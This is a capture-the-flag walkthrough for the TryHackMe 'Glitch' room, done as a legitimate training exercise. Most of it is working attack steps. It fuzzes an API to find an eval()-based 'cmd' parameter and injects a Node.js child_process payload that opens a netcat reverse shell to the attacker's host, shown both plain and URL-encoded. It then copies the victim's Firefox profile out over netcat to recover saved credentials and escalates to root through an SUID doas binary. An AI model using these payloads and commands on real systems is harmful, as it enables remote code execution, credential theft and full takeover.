TryHackMe solution: GLITCH

Link: https://tryhackme.com/room/glitch

#1 “What is your access token?“

Use:

nmap -sCV 10.10.108.245

Port 80 is open, so we access: http://10.10.108.245/

View page source we found a link:

Access: http://10.10.108.245/api/access

Decode the token with base64 decoder.

#2 “What is the content of user.txt?“

Use gobuster and common.txt.

gobuster -u http://10.10.108.245/api/ -w common.txt

Access: http://10.10.108.245/api/items

Access this link again but use POST method, we get:

Now, we use Wfuzz and common.txt to find a parameter.

wfuzz -c -z file,common.txt -X POST --hh 45 -u http://10.10.29.82/api/items\?FUZZ\=test

-c : Output with colors
-z payload : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
-X method : Specify an HTTP method for the request, ie. HEAD or FUZZ
–hh N[,N]+ : Hide responses with the specified chars
-u url : Specify a URL for the request.

We found 'cmd', send a POST request: http://10.10.29.82/api/items?cmd=test

‘test‘ is executed in a eval() function. Stand up a netcat listener on port 1234.

nc -lvnp 1234

Create a shell with payload:

cmd=require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.63.158 1234 >/tmp/f')

URL encode:

POST http://10.10.29.82/api/items?%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%36%2e%36%33%2e%31%35%38%20%31%32%33%34%20%3e%2f%74%6d%70%2f%66%27%29

And we found the flag.

#3 “What is the content of root.txt?“

In /home/user we found a directory named “.firefox“.

Let’s get this directory, on our machine run:

nc -nlvp 1235 > a.tar

On the machine, run:

tar -cf a.tar .firefox/
nc 10.6.63.158 1235 < a.tar

After receiving the file, use:

tar xf a.tar

to extract the file.

Open the credential in our firefox with:

firefox --profile .firefox/b5w4643p.default-release --allow-downgrade

Spawn a tty shell with:

python -c 'import pty; pty.spawn("/bin/sh");'

and change to v0id:

su v0id

Use:

find / -perm -u=s -type f 2>/dev/null

We found /usr/local/bin/doas.

Change to root with:

doas -u root /bin/sh

And we have the flag.